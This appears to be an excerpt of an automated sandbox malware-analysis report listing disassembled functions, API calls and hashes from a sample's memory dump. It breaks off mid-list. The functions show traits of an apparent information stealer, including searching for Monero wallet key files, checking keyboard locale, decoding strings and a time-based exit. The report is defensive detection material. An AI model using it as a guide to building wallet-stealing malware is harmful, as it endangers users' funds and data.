                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 90eb4d1f6350af746148cfbf964be5e92e43f810bd1196c58a513ec0a4c6e310
                  • Instruction ID: 77f36e5fab45c4b7c807722b35374e508e3612bf2731e69988bf998e08b523cf
                  • Opcode Fuzzy Hash: 90eb4d1f6350af746148cfbf964be5e92e43f810bd1196c58a513ec0a4c6e310
                  • Instruction Fuzzy Hash: 8D125871990119ABEB15FB60CC96EED733CEF64305F824199B50A660A1EF306F89CF91
                  Function 0013DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00150C2E), ref: 0013DE5E
                  • StrCmpCA.SHLWAPI(?,001514C8), ref: 0013DEAE
                  • StrCmpCA.SHLWAPI(?,001514CC), ref: 0013DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013E3E0
                  • FindClose.KERNEL32(000000FF), ref: 0013E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: f4c08b2f6a9e5d6915bd04a1bffd0c64790685594a182fdd6681a4cb8880e721
                  • Instruction ID: a6c70aea99d2e46eb61b16906e527c5ba564741102837ddedfef5a5d049a2302
                  • Opcode Fuzzy Hash: f4c08b2f6a9e5d6915bd04a1bffd0c64790685594a182fdd6681a4cb8880e721
                  • Instruction Fuzzy Hash: 5AF1C2718541199AEB25EB60DC95EEE7338FF64305FC241D9A41A620A1EF306F8ACF52
                  Function 0013DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,001514B0,00150C2A), ref: 0013DAEB
                  • StrCmpCA.SHLWAPI(?,001514B4), ref: 0013DB33
                  • StrCmpCA.SHLWAPI(?,001514B8), ref: 0013DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013DDCC
                  • FindClose.KERNEL32(000000FF), ref: 0013DDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: cb4845a1a2769cbc2eb725be01425de2217e035f880ec39ab74b5a8adfd8f528
                  • Instruction ID: 42196aa51eacb33f8ae1dc0b5e9d9955cd8286d1a88c3022628ee9d9149588b3
                  • Opcode Fuzzy Hash: cb4845a1a2769cbc2eb725be01425de2217e035f880ec39ab74b5a8adfd8f528
                  • Instruction Fuzzy Hash: E8917672940104ABDB14FBB0EC569ED737DAFA4305F818668F80A96191EF349B4DCB93
                  Function 004F8E2A Relevance: 11.7, Strings: 8, Instructions: 1660COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: /4a$L,tw$Y5;_$kCq}$s?_$KVW$a}$|
                  • API String ID: 0-459462844
                  • Opcode ID: 09f597461a65a1ffb891aee149d95ec33f16de602db645bef53b32f7b9c4e7f4
                  • Instruction ID: c3544d63376764c16b16cec25c9109492b47807488fcfc5ebcec2a82e182c456
                  • Opcode Fuzzy Hash: 09f597461a65a1ffb891aee149d95ec33f16de602db645bef53b32f7b9c4e7f4
                  • Instruction Fuzzy Hash: 12B229F3A0C2149FE3046E2DEC8567AFBE9EF94720F16463EEAC5C3744E93558018696
                  Function 004FFC28 Relevance: 11.6, Strings: 8, Instructions: 1606COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: '/o~$3"kW$?I}'$TO_&$d~~$g$j$y0t$z0t
                  • API String ID: 0-793602160
                  • Opcode ID: 00404fcd1267f3e561f3367b606a71042534d69e5f192326a5102d94425b0c97
                  • Instruction ID: ceea04f84da1ae57fb4eaac02ab10fe1c2392d0ace11d82676df1c88e3676e77
                  • Opcode Fuzzy Hash: 00404fcd1267f3e561f3367b606a71042534d69e5f192326a5102d94425b0c97
                  • Instruction Fuzzy Hash: 9CB2F7F360C2049FE304AE2DEC8577ABBE9EF94720F1A453DE6C4C7744EA3598058696
                  Function 00147B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,001505AF), ref: 00147BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00147BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00147C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00147C62
                  • LocalFree.KERNEL32(00000000), ref: 00147D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: 73034a70f9d72cabcc3f3ad586f78b5e7961fd19ac02c49ac1989a0244df6585
                  • Instruction ID: 8f266eb4b3acf34f168f39029cc294c1954d6148893de05b3cedc0a1ae6c0d3c
                  • Opcode Fuzzy Hash: 73034a70f9d72cabcc3f3ad586f78b5e7961fd19ac02c49ac1989a0244df6585
                  • Instruction Fuzzy Hash: 0E418E71940218ABDB24DF94DC99BEEB378FF58701F6041D9E409621A0DB342F85CFA1
                  Function 00508179 Relevance: 10.4, Strings: 7, Instructions: 1669COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: !q_$#ign$*z)$Co}$Htw~$oI}$r!my
                  • API String ID: 0-641420045
                  • Opcode ID: 984e36127ccb1973385178b7806184a78a04cb11f4c5b248469dca2ea9cd132b
                  • Instruction ID: a2cda7dae0ce6ffb1e06567f193560054c749dbd3f6e199dc69b31e7f3aa60fa
                  • Opcode Fuzzy Hash: 984e36127ccb1973385178b7806184a78a04cb11f4c5b248469dca2ea9cd132b
                  • Instruction Fuzzy Hash: E2B2F9F360C2049FE3046E2DEC8567AFBE5EF94720F1A463DE6C5C7744EA3598018696
                  Function 0050EE3E Relevance: 10.4, Strings: 7, Instructions: 1651COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: Yf|~$eb)[$fk?$l '}$-_~$=}$zPe
                  • API String ID: 0-643601056
                  • Opcode ID: 111012089001c0cb4a7fcf494ec8c56f37c63995151c0d436de0e3f989031872
                  • Instruction ID: 118516986f1b8b4fccc0542f08e284d7f99ae6f45efb46328506e4041e17b001
                  • Opcode Fuzzy Hash: 111012089001c0cb4a7fcf494ec8c56f37c63995151c0d436de0e3f989031872
                  • Instruction Fuzzy Hash: 20B206F3A08214AFD314AE2DEC8577ABBE9EF94720F16493DEAC4C3744E53598058693
                  Function 0013E430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0014A740: lstrcpy.KERNEL32(00150E17,00000000), ref: 0014A788
                    • Part of subcall function 0014A920: lstrcpy.KERNEL32(00000000,?), ref: 0014A972
                    • Part of subcall function 0014A920: lstrcat.KERNEL32(00000000), ref: 0014A982
                    • Part of subcall function 0014A9B0: lstrlen.KERNEL32(?,010289D0,?,\Monero\wallet.keys,00150E17), ref: 0014A9C5
                    • Part of subcall function 0014A9B0: lstrcpy.KERNEL32(00000000), ref: 0014AA04
                    • Part of subcall function 0014A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0014AA12
                    • Part of subcall function 0014A8A0: lstrcpy.KERNEL32(?,00150E17), ref: 0014A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00150D73), ref: 0013E4A2
                  • StrCmpCA.SHLWAPI(?,001514F8), ref: 0013E4F2
                  • StrCmpCA.SHLWAPI(?,001514FC), ref: 0013E508
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 0013EBDF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 433455689-1173974218
                  • Opcode ID: 027f4cd9ff394134a2cd4d7ef35d34b10a120377abd63c1527606b6d1c525ac3
                  • Instruction ID: cc85c2c79e37e4d896b106ea72ff140988f8f9c485f1f640651308a26a7dc47b
                  • Opcode Fuzzy Hash: 027f4cd9ff394134a2cd4d7ef35d34b10a120377abd63c1527606b6d1c525ac3
                  • Instruction Fuzzy Hash: 9312AA71990118ABEB15FB70DC96EED7338AF64305FC245A8B50A960A1EF305F49CF92
                  Function 0013C820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                  Download Yara Rule
                  APIs
                  • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0013C871
                  • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0013C87C
                  • lstrcat.KERNEL32(?,00150B46), ref: 0013C943
                  • lstrcat.KERNEL32(?,00150B47), ref: 0013C957
                  • lstrcat.KERNEL32(?,00150B4E), ref: 0013C978
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000061D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.0000000000634000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065686622.0000000000635000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066036021.00000000007D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2066051647.00000000007D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_130000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$BinaryCryptStringlstrlen
                  • String ID:
                  • API String ID: 189259977-0
                  • Opcode ID: e58604d1fd8d519bc68302d5aa22c1e2f6504d7208df95a88d4f0b2e66414b7b
                  • Instruction ID: be562897d5c54c16543bf3a1f757c0c03562e50b463ff889ed826c74c9446fad
                  • Opcode Fuzzy Hash: e58604d1fd8d519bc68302d5aa22c1e2f6504d7208df95a88d4f0b2e66414b7b
                  • Instruction Fuzzy Hash: 2341407590421ADFDB20DFA4DD89BFEF7B8BB88705F1041A8E509B6280D7745A84CF91
                  Function 00146920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON
                  Download Yara Rule
                  APIs
                  • GetSystemTime.KERNEL32(?), ref: 0014696C
                  • sscanf.NTDLL ref: 00146999
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001469B2
                  • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001469C0
                  • ExitProcess.KERNEL32 ref: 001469DA
                  Memory Dump Source
                  • Source File: 00000000.00000002.2065249327.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                  • Associated: 00000000.00000002.2065233224.0000000000130000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.00000000001ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.0000000000212000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065249327.000000000037A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000038E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.000000000051C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2065432203.00000000005FB000.00000040.00000001.01000000.00000003.sdmpDownload File
